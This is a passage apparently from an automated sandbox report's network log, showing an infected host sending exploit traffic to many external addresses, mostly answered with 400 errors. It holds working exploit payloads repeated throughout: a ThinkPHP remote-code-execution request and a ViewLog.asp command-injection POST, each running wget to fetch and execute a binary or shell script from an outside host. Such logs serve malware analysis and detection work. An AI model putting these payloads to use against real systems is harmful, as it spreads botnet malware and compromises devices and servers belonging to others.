                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              936192.168.2.233658688.198.85.8180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:27.389583111 CET18276OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:27.695631027 CET18281INHTTP/1.1 400 Bad Request
                                                              Server: nginx
                                                              Date: Mon, 13 Nov 2023 21:20:27 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 150
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              937192.168.2.235818431.136.243.1228080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:27.398206949 CET18278OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:28.417996883 CET18402OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:30.401868105 CET18643OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:34.369386911 CET19139OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:42.304157019 CET20126OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:58.174256086 CET20692OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:21:31.193763018 CET20716OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              938192.168.2.235204694.120.97.558080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:27.414681911 CET18278OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              939192.168.2.234497888.87.20.5080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:27.720789909 CET18314OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:28.051943064 CET18391INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:27 GMT
                                                              Server: Apache
                                                              Content-Length: 226
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              94192.168.2.234182631.136.133.2098080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:24.130359888 CET3057OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:25.138256073 CET3197OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:27.153999090 CET3450OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:31.249593019 CET3961OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:39.440454960 CET4922OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:18:55.566488981 CET6852OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:28.329930067 CET10885OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              940192.168.2.234231062.29.42.1648080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:27.745218992 CET18375OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              941192.168.2.236046688.135.124.14480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:27.752942085 CET18376OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:28.120408058 CET18396INHTTP/1.1 400 Bad Request
                                                              Server: Web server
                                                              Date: Mon, 13 Nov 2023 21:20:18 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 155
                                                              Connection: close
                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              942192.168.2.235360295.9.224.2218080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:27.768023968 CET18377OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              943192.168.2.234878488.198.201.280
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:28.357954979 CET18400OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:28.662431002 CET18407INHTTP/1.1 400 Bad Request
                                                              Date: Mon, 13 Nov 2023 21:20:28 GMT
                                                              Server: Apache/2.4.29 (Ubuntu)
                                                              Content-Length: 315
                                                              Connection: close
                                                              Content-Type: text/html; charset=iso-8859-1
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 6f 6d 70 6c 65 74 65 6c 79 64 65 6e 69 6d 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.completelydenim.com Port 80</address></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              944192.168.2.235785288.221.238.15480
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:28.363528013 CET18400OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:20:28.673382998 CET18417INHTTP/1.0 400 Bad Request
                                                              Server: AkamaiGHost
                                                              Mime-Version: 1.0
                                                              Content-Type: text/html
                                                              Content-Length: 258
                                                              Expires: Mon, 13 Nov 2023 21:20:28 GMT
                                                              Date: Mon, 13 Nov 2023 21:20:28 GMT
                                                              Connection: close
                                                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 61 31 62 35 33 65 31 37 26 23 34 36 3b 31 36 39 39 39 31 30 34 32 38 26 23 34 36 3b 33 37 38 31 30 62 64 66 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                              Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;a1b53e17&#46;1699910428&#46;37810bdf</BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              945192.168.2.233303831.125.160.1208080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:28.387763977 CET18401OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:28.687078953 CET18438INHTTP/1.1 302 Found
                                                              Location: https://192.168.0.14:8443
                                                              Content-Length: 0
                                                              Date: Mon, 13 Nov 2023 21:20:28 GMT
                                                              Server: Server
                                                              Nov 13, 2023 22:20:28.956556082 CET18502INHTTP/1.1 302 Found
                                                              Location: https://192.168.0.14:8443
                                                              Content-Length: 0
                                                              Date: Mon, 13 Nov 2023 21:20:28 GMT
                                                              Server: Server


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              946192.168.2.233912231.136.101.908080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:20:28.417951107 CET18402OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
